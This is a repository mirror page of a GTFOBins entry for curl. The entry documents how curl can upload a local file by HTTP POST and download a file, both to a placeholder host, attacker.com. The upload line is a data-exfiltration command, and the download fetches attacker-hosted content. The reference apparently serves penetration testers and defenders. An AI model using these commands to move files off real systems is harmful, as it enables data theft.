This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-11 09:51:33 +01:00
Code
Issues
2b4fbed8a6
GTFOBins.github.io
/
_gtfobins
/
curl.md
Emilio Pinna
b857c98f92
Use target.com and attacker.com
2018-05-24 21:05:11 +01:00
395 B
Raw
Blame
History
functions
upload
download
description
code
Send local file with an HTTP POST request.
URL=
http://attacker.com/
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=where_to_save curl $URL -o $LFILE